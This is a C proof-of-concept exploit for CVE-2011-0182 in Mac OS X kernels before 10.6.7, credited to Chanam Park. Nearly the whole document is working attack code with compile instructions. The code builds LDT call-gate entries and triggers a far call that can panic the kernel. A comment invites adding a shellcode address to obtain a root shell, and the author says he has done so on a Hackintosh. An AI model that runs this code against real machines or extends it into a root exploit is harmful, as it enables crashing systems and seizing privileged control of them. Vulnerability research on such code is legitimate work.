Mac OS X < 10.6.7 - Kernel Panic Exploit



/*

    Mac OS X < 10.6.7 Kernel Panic Exploit
    CVE-2011-0182, Proof Of Concept Code

    Author    - Chanam Park (hkpco)
    Date    - 2011. 06
    Contact    - chanam.park@hkpco.kr , http://hkpco.kr , @hkpco

    Thanks for inspiration / x82, riaf.
*/
// Compile: gcc -o CVE-2011-0182_PoC CVE-2011-0182_PoC.c -m32

#include <architecture/i386/table.h>
#include <i386/user_ldt.h>

#include <unistd.h>

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

void dummy_func( void ) { asm volatile( ".byte 0xff" ); }

int main( void )
{
    int ret;
    union ldt_entry cgate, cgate2;
    char dummy[128] = {0x00,};

    cgate.call_gate.offset00        = (unsigned int)dummy_func & 0xffff;
    cgate.call_gate.offset16        = ((unsigned int)dummy_func >> 16) & 0xffff;
    // You can input shellcode address value here to get the root shell.
    /* I got the root shell before. But, It was tested on Hackintosh for AMD. :-p
       The normal system has a little different environment.
       I have no time for this anymore because of my summer break is over.
       So.. Good Luck! */

    cgate.call_gate.argcnt          = 0;
    cgate.call_gate.type            = 0xc; // DESC_CALL_GATE
    cgate.call_gate.dpl             = 3;
    cgate.call_gate.present         = 1;

    cgate.call_gate.seg.rpl         = 0;
    cgate.call_gate.seg.ti          = 0;
    cgate.call_gate.seg.index       = 16;

    cgate2.call_gate.offset00       = 0x0;

    cgate2.call_gate.seg.rpl        = 0;
    cgate2.call_gate.seg.ti         = 0;
    cgate2.call_gate.seg.index      = 0;

    cgate2.call_gate.argcnt         = 0;
    cgate2.call_gate.type           = 0;
    cgate2.call_gate.dpl            = 0;
    cgate2.call_gate.present        = 1;

    cgate2.call_gate.offset16       = 0x0;

    printf( "// coded by Chanam Park (hkpco)\n\n" );

    ret = i386_set_ldt( LDT_AUTO_ALLOC, &cgate, 1 );
    printf( "Selector Number in LDT <1>: 0x%x\n", ret );

    ret = i386_set_ldt( LDT_AUTO_ALLOC, &cgate2, 1 );
    printf( "Selector Number in LDT <2>: 0x%x\n\n", ret );

    printf( "If you run this program, it can possibly cause \"Kernel Panic\".\n" );
    printf( "The program will be continued when you input any value.\n" );
    printf( "-> " );
    fflush(stdout);
    scanf( "%s", dummy );

    asm volatile( "lcall $0x3f, $0x0" );
    // Trigger

    return 0;
}